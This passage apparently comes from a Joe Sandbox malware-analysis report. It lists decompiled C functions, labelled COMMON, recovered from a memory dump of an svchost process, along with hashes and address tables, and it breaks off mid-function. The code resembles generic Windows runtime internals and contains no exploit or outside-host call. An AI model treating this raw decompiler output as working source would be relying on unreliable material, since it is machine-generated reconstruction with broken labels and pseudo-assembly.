                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction ID: ed291e0e7c41d09bacf62d7a4c8c015f3c8d51b4ce1d4391ddb27bbccdf50be2
                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction Fuzzy Hash: A5510231E0624AEFDB60CB68C0D07EEFBF9AF46314F1C82A8D44597281C3B5A989C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F740D Relevance: .1, Instructions: 141COMMON
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E030F740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0307D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0306F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03044620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03044620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0306F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03044620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                        0x030f740d
                        0x030f740d
                        0x030f7412
                        0x030f7413
                        0x030f7416
                        0x030f7418
                        0x030f741c
                        0x030f741f
                        0x030f7422
                        0x030f7422
                        0x030f7428
                        0x030f742a
                        0x030f742a
                        0x030f7451
                        0x030f7432
                        0x030f744f
                        0x030f744f
                        0x00000000
                        0x030f7434
                        0x030f7438
                        0x030f7443
                        0x030f7517
                        0x030f7517
                        0x030f751a
                        0x030f7535
                        0x030f7520
                        0x030f7527
                        0x030f752c
                        0x030f7531
                        0x030f7533
                        0x00000000
                        0x030f7533
                        0x00000000
                        0x030f7531
                        0x030f754b
                        0x030f754f
                        0x030f755c
                        0x030f755c
                        0x030f755f
                        0x030f7560
                        0x030f7561
                        0x030f7562
                        0x030f7563
                        0x030f7568
                        0x030f756a
                        0x030f756c
                        0x030f756d
                        0x030f756d
                        0x030f756f
                        0x030f7572
                        0x030f7574
                        0x030f7577
                        0x030f757c
                        0x030f757f
                        0x00000000
                        0x030f7551
                        0x030f7551
                        0x030f7551
                        0x030f7553
                        0x030f7553
                        0x030f7449
                        0x030f7449
                        0x030f744c
                        0x030f744c
                        0x00000000
                        0x030f744c
                        0x030f7443
                        0x030f750e
                        0x030f7514
                        0x030f7514
                        0x030f7455
                        0x030f7469
                        0x030f746d
                        0x00000000
                        0x030f7473
                        0x030f7473
                        0x030f7476
                        0x030f7480
                        0x030f7484
                        0x030f748e
                        0x030f7493
                        0x030f7493
                        0x030f7496
                        0x030f7499
                        0x030f74a1
                        0x030f74b1
                        0x030f74b5
                        0x00000000
                        0x030f74bb
                        0x030f74c1
                        0x030f74c1
                        0x030f74c4
                        0x030f74c5
                        0x030f74c6
                        0x030f74c7
                        0x030f74c8
                        0x030f74cd
                        0x00000000
                        0x030f74d3
                        0x030f74d3
                        0x030f74d6
                        0x030f74d8
                        0x030f74db
                        0x030f74dd
                        0x030f74e0
                        0x030f74e7
                        0x030f74ee
                        0x030f74ee
                        0x030f74f4
                        0x030f74f9
                        0x00000000
                        0x030f74fb
                        0x030f74fb
                        0x030f74fd
                        0x030f7500
                        0x030f7503
                        0x030f7505
                        0x030f7505
                        0x030f74f9
                        0x00000000
                        0x030f74cd
                        0x030f74b5
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction ID: 21bca3fbe37a9082ca2dcf7dce8a75022351ac655256c2c6a94e7264b883fea7
                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction Fuzzy Hash: 21519D71601606EFCB15CF14C880AA6FBF5FF45B44F1880AAE9089F612E3B1E945CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03052990 Relevance: .1, Instructions: 133COMMON
                        Download Yara Rule
                        C-Code - Quality: 97%
                        			E03052990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x30fff00);
				E0307D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3001664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0306E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3001668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E030A51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x300166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03052AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E03036600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03052C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0303EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03052AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03052C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03052ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0307D0D1(_t62);
				goto L28;
			}





















                        0x03052990
                        0x03052992
                        0x03052997
                        0x030529a3
                        0x030529a6
                        0x030529ab
                        0x030529ad
                        0x030529b2
                        0x03095c80
                        0x030529b8
                        0x030529b8
                        0x030529bb
                        0x030529c0
                        0x030529c5
                        0x030529c6
                        0x030529c6
                        0x030529cb
                        0x00000000
                        0x00000000
                        0x030529cd
                        0x030529d0
                        0x030529d9
                        0x030529db
                        0x030529dd
                        0x03052a7f
                        0x03052a84
                        0x03052a87
                        0x03052a89
                        0x03095ca1
                        0x03095ca3
                        0x00000000
                        0x03052a8f
                        0x03052a8f
                        0x00000000
                        0x03052a8f
                        0x00000000
                        0x030529e3
                        0x030529e3
                        0x030529e3
                        0x00000000
                        0x030529e3
                        0x030529dd
                        0x00000000
                        0x030529db
                        0x030529e6
                        0x030529e9
                        0x030529eb
                        0x030529ed
                        0x030529f3
                        0x030529f5
                        0x030529f8
                        0x030529fa
                        0x03052a97
                        0x03052a9a
                        0x03052a9d
                        0x03052add
                        0x00000000
                        0x03052a9f
                        0x03052aa2
                        0x03052aa5
                        0x03052aa8
                        0x03052aab
                        0x03095cab
                        0x03095caf
                        0x03095cc5
                        0x03095cda
                        0x03095cdc
                        0x03095cdf
                        0x03095ce5
                        0x00000000
                        0x03095ceb
                        0x03095ced
                        0x03095cee
                        0x00000000
                        0x03095cee
                        0x03095cb1
                        0x03095cb4
                        0x03095cb9
                        0x03095cbb
                        0x00000000
                        0x03095cbd
                        0x03095cbd
                        0x00000000
                        0x03095cbd
                        0x03095cbb
                        0x03052ab1
                        0x03052ab1
                        0x03052ac4
                        0x03052ac6
                        0x03052ac6
                        0x00000000
                        0x03052ac6
                        0x03052aab
                        0x00000000
                        0x03052a00
                        0x03052a09
                        0x03052a0e
                        0x03052a21
                        0x03052a24
                        0x03052a35
                        0x03052a3a
                        0x03052a3d
                        0x03052a42
                        0x03052a59
                        0x03052a59
                        0x03052a5c
                        0x03052a5f
                        0x03052a5f
                        0x030529fa
                        0x030529f3
                        0x03052a64
                        0x03052a64
                        0x03052a6b
                        0x03052a6b
                        0x03052a6d
                        0x03052a72
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dcfbb14a157c908fe71797c883af31c73a171d5d4b9910e78a40726d32b33b62
                        • Instruction ID: e5630ec100cbbd967c388448bb7263fd0578645cd0e282f1fb7da896daf0d4d4
                        • Opcode Fuzzy Hash: dcfbb14a157c908fe71797c883af31c73a171d5d4b9910e78a40726d32b33b62
                        • Instruction Fuzzy Hash: A5514675A02209DFDF25DF55C880ADFBBB9BF48310F198855FC15AB220C3359952CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03054BAD Relevance: .1, Instructions: 131COMMON
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E03054BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x311d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0302CC50(_t86);
					L11:
					return E0306B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x3118504
				E03042280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0306FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0306B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03044620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0302CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x3118504
								E0303FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03054F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                        0x03054bad
                        0x03054bbf
                        0x03054bc2
                        0x03054bc6
                        0x03054bcd
                        0x03054bd9
                        0x030967fe
                        0x03096800
                        0x03054ccc
                        0x03054ccd
                        0x03054cb7
                        0x03054cc9
                        0x03054cc9
                        0x03054bdf
                        0x03054be5
                        0x00000000
                        0x00000000
                        0x03054beb
                        0x03054bef
                        0x00000000
                        0x00000000
                        0x03054bf5
                        0x03054bf9
                        0x03054c06
                        0x03054c0b
                        0x03054c17
                        0x03054c1c
                        0x03054c1f
                        0x03054c25
                        0x03054c33
                        0x03054c3d
                        0x03054c40
                        0x03054c43
                        0x03054c47
                        0x03054c4d
                        0x03054c53
                        0x03054c54
                        0x03054c55
                        0x03054c56
                        0x03054c5b
                        0x03054c5c
                        0x03054c63
                        0x03054c6b
                        0x00000000
                        0x00000000
                        0x03096776
                        0x03096784
                        0x03096784
                        0x0309679f
                        0x030967a7
                        0x030967af
                        0x030967ce
                        0x00000000
                        0x030967b1
                        0x030967b7
                        0x030967b8
                        0x030967c1
                        0x030967d3
                        0x030967d9
                        0x030967dd
                        0x03054c94
                        0x03054c94
                        0x03054c98
                        0x03054c9c
                        0x03054ca3
                        0x030967f4
                        0x030967f4
                        0x03054cb5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03054cb5
                        0x03054c79
                        0x03054c7e
                        0x03054c89
                        0x03054c8b
                        0x03054c8f
                        0x03054c8f
                        0x00000000
                        0x03054c89
                        0x030967c3
                        0x00000000
                        0x030967c3
                        0x030967af
                        0x03054c73
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2fa8aa891500bfb07fe752d45f676a8779b6b9b3c5d1af7d082de0b8f426d871
                        • Instruction ID: 7c383d52e175082f019e877642dad22348c6fde4b92f65b6e2345ceacb4f303f
                        • Opcode Fuzzy Hash: 2fa8aa891500bfb07fe752d45f676a8779b6b9b3c5d1af7d082de0b8f426d871
                        • Instruction Fuzzy Hash: 1641B275A022289BDF60DF65CD40BEFB7F8EF85710F4504A6E908AB240DB759E80CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03054D3B Relevance: .1, Instructions: 131COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E03054D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x311d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0306FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3117bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0306B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03044620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0302CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0306B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0306F380(_t67 + 0xc, 0x3005138, 0x10) == 0) {
								 *0x31160d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03054F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03054E70(0x31186b0, 0x3055690, 0, 0) != 0) {
					_t46 = E0302CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                        0x03054d3b
                        0x03054d4d
                        0x03054d53
                        0x03054d58
                        0x03054d65
                        0x03054d6c
                        0x03054d71
                        0x03054d77
                        0x03054d7f
                        0x03054d8c
                        0x03054d8e
                        0x03054dad
                        0x03054db0
                        0x03054db7
                        0x03054db8
                        0x03054db9
                        0x03054dba
                        0x03054dbb
                        0x03054dc1
                        0x03054dc8
                        0x03054dcc
                        0x03054dd5
                        0x03054dde
                        0x03054ddf
                        0x03054de0
                        0x03054de1
                        0x03054de6
                        0x03054de7
                        0x03054de9
                        0x03054df3
                        0x00000000
                        0x00000000
                        0x03096c7c
                        0x03096c8a
                        0x03096c8a
                        0x03096c9d
                        0x03096ca7
                        0x03096cac
                        0x03096cb2
                        0x03096cb9
                        0x00000000
                        0x03096cbf
                        0x03096cbf
                        0x00000000
                        0x03096cbf
                        0x03096cb9
                        0x03054dfb
                        0x03096ccf
                        0x03096cd3
                        0x03054e32
                        0x03054e39
                        0x03096ce0
                        0x03096cf2
                        0x03096cf2
                        0x03096ce0
                        0x03054e3f
                        0x03054e41
                        0x03054e51
                        0x03054e51
                        0x03054e03
                        0x03054e03
                        0x03054e09
                        0x03054e0f
                        0x03054e57
                        0x00000000
                        0x00000000
                        0x03054e1b
                        0x03054e30
                        0x03054e5b
                        0x03054e5b
                        0x00000000
                        0x03054e30
                        0x03054e11
                        0x03054e11
                        0x03054e16
                        0x00000000
                        0x03054e16
                        0x03054e01
                        0x00000000
                        0x03054e01
                        0x03054da5
                        0x03096c6b
                        0x00000000
                        0x03054dab
                        0x03054dab
                        0x00000000
                        0x03054dab

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4557b36a8c2ca2a8f2f29c929d38f15198db855b5efc170d66ac0c9bb945087e
                        • Instruction ID: 144e6aee84183f45f75f75b45bd40dba32beec53a218fe47eaea3627f7cb7bf4
                        • Opcode Fuzzy Hash: 4557b36a8c2ca2a8f2f29c929d38f15198db855b5efc170d66ac0c9bb945087e
                        • Instruction Fuzzy Hash: 4241B2B5A423189FEB21DF15CC80BEBB7E9EB45610F0444AAFD459B280D771EE84CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03038A0A Relevance: .1, Instructions: 120COMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E03038A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x311d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0306B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0303E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x3001180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03051DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03063C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E03038999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
